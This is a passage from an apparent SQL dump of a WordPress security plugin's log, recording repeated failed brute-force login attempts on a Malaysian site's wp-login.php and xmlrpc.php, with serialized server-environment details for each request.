empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.158.15.146\";s:11:\"REMOTE_PORT\";s:5:\"59872\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG7xCR0vdvYEIduPCLa-wAAAQs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568783300.527\";s:12:\"REQUEST_TIME\";s:10:\"1568783300\";}}','notice','2019-09-18 05:08:22','2019-09-18 05:08:20',17741536,19233560,'https://bintara.com.my/wp-login.php',1,0,'192.158.15.146'),(24917,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.158.15.146\";s:11:\"REMOTE_PORT\";s:5:\"60988\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG7x61FqYKvioG46Y4quAAAAIs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568783303.764\";s:12:\"REQUEST_TIME\";s:10:\"1568783303\";}}','notice','2019-09-18 05:08:25','2019-09-18 05:08:24',18260264,19559000,'https://bintara.com.my/xmlrpc.php',1,0,'192.158.15.146'),(24918,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.228.226\";s:11:\"REMOTE_PORT\";s:5:\"51350\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG8DK1FqYKvioG46Y4q3gAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568783372.4047\";s:12:\"REQUEST_TIME\";s:10:\"1568783372\";}}','notice','2019-09-18 05:09:33','2019-09-18 05:09:32',17741536,19233560,'https://bintara.com.my/wp-login.php',1,0,'139.59.228.226'),(24919,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.228.226\";s:11:\"REMOTE_PORT\";s:5:\"51485\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG8DiqbKGlf1IVly7OeoAAAAUc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568783374.5567\";s:12:\"REQUEST_TIME\";s:10:\"1568783374\";}}','notice','2019-09-18 05:09:36','2019-09-18 05:09:34',18260264,19559000,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.228.226'),(24920,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"136.243.50.70\";s:11:\"REMOTE_PORT\";s:5:\"38560\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG9tSqbKGlf1IVly7OfBwAAAVQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568783797.4452\";s:12:\"REQUEST_TIME\";s:10:\"1568783797\";}}','notice','2019-09-18 05:16:38','2019-09-18 05:16:37',17738888,19229736,'https://bintara.com.my/wp-login.php',1,0,'136.243.50.70'),(24921,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"136.243.50.70\";s:11:\"REMOTE_PORT\";s:5:\"39628\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG9uK1FqYKvioG46Y4sewAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568783800.732\";s:12:\"REQUEST_TIME\";s:10:\"1568783800\";}}','notice','2019-09-18 05:16:42','2019-09-18 05:16:41',18259776,19559656,'https://bintara.com.my/xmlrpc.php',1,0,'136.243.50.70'),(24922,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"37.187.143.89\";s:11:\"REMOTE_PORT\";s:5:\"54588\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG-Ja1FqYKvioG46Y4tawAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568784165.1836\";s:12:\"REQUEST_TIME\";s:10:\"1568784165\";}}','notice','2019-09-18 05:22:47','2019-09-18 05:22:45',17740256,19232136,'https://bintara.com.my/wp-login.php',1,0,'37.187.143.89'),(24923,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"37.187.143.89\";s:11:\"REMOTE_PORT\";s:5:\"55658\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG-KK1FqYKvioG46Y4tbwAAAIo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568784168.553\";s:12:\"REQUEST_TIME\";s:10:\"1568784168\";}}','notice','2019-09-18 05:22:49','2019-09-18 05:22:48',18256624,19555224,'https://bintara.com.my/xmlrpc.php',1,0,'37.187.143.89'),(24924,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.163.199\";s:11:\"REMOTE_PORT\";s:5:\"43828\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHCZ61FqYKvioG46Y4wKAAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568784999.6586\";s:12:\"REQUEST_TIME\";s:10:\"1568784999\";}}','notice','2019-09-18 05:36:41','2019-09-18 05:36:40',17741800,19232504,'https://bintara.com.my/wp-login.php',1,0,'50.63.163.199'),(24925,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 